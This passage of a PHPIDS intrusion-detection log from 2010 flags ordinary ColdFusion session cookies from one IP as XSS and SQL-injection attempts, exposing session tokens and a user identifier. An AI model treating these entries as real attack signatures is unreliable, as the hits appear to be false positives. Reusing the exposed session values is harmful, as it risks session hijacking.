Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.125
Converted: ((((+::

ID:122922
Name:COOKIE.UserAuthentication
Value:authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US
Page:/i.php?page=videos/when-web-2-attacks-rafal-los
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:49
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:122911
Name:REQUEST.CFCLIENT_MOTNES
Value:userrecid=0#loggedin=false#
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:44
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:122912
Name:REQUEST.CFGLOBALS
Value:urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606#
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:44
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.125
Converted: ((((+::

ID:122913
Name:REQUEST.UserAuthentication
Value:authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:44
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:122914
Name:COOKIE.CFCLIENT_MOTNES
Value:userrecid=0#loggedin=false#
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:44
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:122915
Name:COOKIE.CFGLOBALS
Value:urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606#
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:44
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.125
Converted: ((((+::

ID:122916
Name:COOKIE.UserAuthentication
Value:authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:44
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:122905
Name:REQUEST.CFCLIENT_MOTNES
Value:userrecid=0#loggedin=false#
Page:/i.php?page=security/xss-sql-and-command-inject-vectors
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:40
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:122906
Name:REQUEST.CFGLOBALS
Value:urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606#
Page:/i.php?page=security/xss-sql-and-command-inject-vectors
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:40
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.125
Converted: ((((+::

ID:122907
Name:REQUEST.UserAuthentication
Value:authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US
Page:/i.php?page=security/xss-sql-and-command-inject-vectors
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:40
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:122908
Name:COOKIE.CFCLIENT_MOTNES
Value:userrecid=0#loggedin=false#
Page:/i.php?page=security/xss-sql-and-command-inject-vectors
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:40
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:122909
Name:COOKIE.CFGLOBALS
Value:urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606#
Page:/i.php?page=security/xss-sql-and-command-inject-vectors
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:40
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.125
Converted: ((((+::

ID:122910
Name:COOKIE.UserAuthentication
Value:authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US
Page:/i.php?page=security/xss-sql-and-command-inject-vectors
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:40
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:122899
Name:REQUEST.CFCLIENT_MOTNES
Value:userrecid=0#loggedin=false#
Page:/i.php?page=security/igigle-wigle-wifi-to-google-earth-client-for-wardrive-mapping
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:36
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:122900
Name:REQUEST.CFGLOBALS
Value:urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606#
Page:/i.php?page=security/igigle-wigle-wifi-to-google-earth-client-for-wardrive-mapping
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:36
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.125
Converted: ((((+::

ID:122901
Name:REQUEST.UserAuthentication
Value:authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US
Page:/i.php?page=security/igigle-wigle-wifi-to-google-earth-client-for-wardrive-mapping
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:36
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:122902
Name:COOKIE.CFCLIENT_MOTNES
Value:userrecid=0#loggedin=false#
Page:/i.php?page=security/igigle-wigle-wifi-to-google-earth-client-for-wardrive-mapping
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:36
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:122903
Name:COOKIE.CFGLOBALS
Value:urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606#
Page:/i.php?page=security/igigle-wigle-wifi-to-google-earth-client-for-wardrive-mapping
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:36
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.125
Converted: ((((+::

ID:122904
Name:COOKIE.UserAuthentication
Value:authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US
Page:/i.php?page=security/igigle-wigle-wifi-to-google-earth-client-for-wardrive-mapping
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:36
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:122893
Name:REQUEST.CFCLIENT_MOTNES
Value:userrecid=0#loggedin=false#
Page:/i.php?page=videos/shmoocon-test-video-avisynth-split-screen
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:32
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:122894
Name:REQUEST.CFGLOBALS
Value:urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606#
Page:/i.php?page=videos/shmoocon-test-video-avisynth-split-screen
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:32
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.125
Converted: ((((+::

ID:122895
Name:REQUEST.UserAuthentication
Value:authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US
Page:/i.php?page=videos/shmoocon-test-video-avisynth-split-screen
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:32
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:122896
Name:COOKIE.CFCLIENT_MOTNES
Value:userrecid=0#loggedin=false#
Page:/i.php?page=videos/shmoocon-test-video-avisynth-split-screen
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:32
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:122897
Name:COOKIE.CFGLOBALS
Value:urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606#
Page:/i.php?page=videos/shmoocon-test-video-avisynth-split-screen
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:32
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.125
Converted: ((((+::

ID:122898
Name:COOKIE.UserAuthentication
Value:authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US
Page:/i.php?page=videos/shmoocon-test-video-avisynth-split-screen
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:32
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:122887
Name:REQUEST.CFCLIENT_MOTNES
Value:userrecid=0#loggedin=false#
Page:/i.php?page=videos/anti-forensics-occult-computing
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:27
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:122888
Name:REQUEST.CFGLOBALS
Value:urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606#
Page:/i.php?page=videos/anti-forensics-occult-computing
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:27
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.125
Converted: ((((+::

ID:122889
Name:REQUEST.UserAuthentication
Value:authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US
Page:/i.php?page=videos/anti-forensics-occult-computing
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:27
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:122890
Name:COOKIE.CFCLIENT_MOTNES
Value:userrecid=0#loggedin=false#
Page:/i.php?page=videos/anti-forensics-occult-computing
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:27
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:122891
Name:COOKIE.CFGLOBALS
Value:urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606#
Page:/i.php?page=videos/anti-forensics-occult-computing
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:27
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.125
Converted: ((((+::

ID:122892
Name:COOKIE.UserAuthentication
Value:authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US
Page:/i.php?page=videos/anti-forensics-occult-computing
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:27
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:122881
Name:REQUEST.CFCLIENT_MOTNES
Value:userrecid=0#loggedin=false#
Page:/i.php?page=videos/attacking-and-securing-wpa-enterprise-matt-neely
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:23
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:122882
Name:REQUEST.CFGLOBALS
Value:urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606#
Page:/i.php?page=videos/attacking-and-securing-wpa-enterprise-matt-neely
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:23
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.125
Converted: ((((+::

ID:122883
Name:REQUEST.UserAuthentication
Value:authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US
Page:/i.php?page=videos/attacking-and-securing-wpa-enterprise-matt-neely
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:23
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:122884
Name:COOKIE.CFCLIENT_MOTNES
Value:userrecid=0#loggedin=false#
Page:/i.php?page=videos/attacking-and-securing-wpa-enterprise-matt-neely
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:23
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:122885
Name:COOKIE.CFGLOBALS
Value:urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606#
Page:/i.php?page=videos/attacking-and-securing-wpa-enterprise-matt-neely
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:23
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.125
Converted: ((((+::

ID:122886
Name:COOKIE.UserAuthentication
Value:authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US
Page:/i.php?page=videos/attacking-and-securing-wpa-enterprise-matt-neely
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:23
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:122875
Name:REQUEST.CFCLIENT_MOTNES
Value:userrecid=0#loggedin=false#
Page:/i.php?page=videos/scott-moulton-reassembling-raid-by-sight-and-sound
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:18
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:122876
Name:REQUEST.CFGLOBALS
Value:urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606#
Page:/i.php?page=videos/scott-moulton-reassembling-raid-by-sight-and-sound
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:18
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.125
Converted: ((((+::

ID:122877
Name:REQUEST.UserAuthentication
Value:authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US
Page:/i.php?page=videos/scott-moulton-reassembling-raid-by-sight-and-sound
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:18
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:122878
Name:COOKIE.CFCLIENT_MOTNES
Value:userrecid=0#loggedin=false#
Page:/i.php?page=videos/scott-moulton-reassembling-raid-by-sight-and-sound
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:18
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:122879
Name:COOKIE.CFGLOBALS
Value:urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606#
Page:/i.php?page=videos/scott-moulton-reassembling-raid-by-sight-and-sound
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:18
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.125
Converted: ((((+::

ID:122880
Name:COOKIE.UserAuthentication
Value:authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US
Page:/i.php?page=videos/scott-moulton-reassembling-raid-by-sight-and-sound
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:18
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:122869
Name:REQUEST.CFCLIENT_MOTNES
Value:userrecid=0#loggedin=false#
Page:/i.php?page=security/programmable-hid-usb-keystroke-dongle
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:13
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:122870
Name:REQUEST.CFGLOBALS
Value:urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606#
Page:/i.php?page=security/programmable-hid-usb-keystroke-dongle
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:13
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.125
Converted: ((((+::

ID:122871
Name:REQUEST.UserAuthentication
Value:authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US
Page:/i.php?page=security/programmable-hid-usb-keystroke-dongle
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:13
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:122872
Name:COOKIE.CFCLIENT_MOTNES
Value:userrecid=0#loggedin=false#
Page:/i.php?page=security/programmable-hid-usb-keystroke-dongle
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:13
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:122873
Name:COOKIE.CFGLOBALS
Value:urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606#
Page:/i.php?page=security/programmable-hid-usb-keystroke-dongle
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:13
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.125
Converted: ((((+::

ID:122874
Name:COOKIE.UserAuthentication
Value:authenticated=no&user_id=6de2d877-ddd3-40ea-8a1f-c61cd4ddba5c&lg_key=00000000-0000-0000-0000-000000000000&geoIP=US
Page:/i.php?page=security/programmable-hid-usb-keystroke-dongle
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:13
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:122863
Name:REQUEST.CFCLIENT_MOTNES
Value:userrecid=0#loggedin=false#
Page:/i.php?page=videos/advanced-data-recovery-forensic-scott-moulton
IP:65.200.90.169
Impact:90
Created:2010-04-29 03:52:10
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:122864
Name:REQUEST.CFGLOBALS
Value:urltoken=CFID#=8275606&CFTOKEN#=30383255#lastvisit={ts '2010-04-29 01:56:48'}#timecreated={ts '2010-04-27 08:52:22'}#hitcount=15#cftoken=30383255#cfid=8275606#
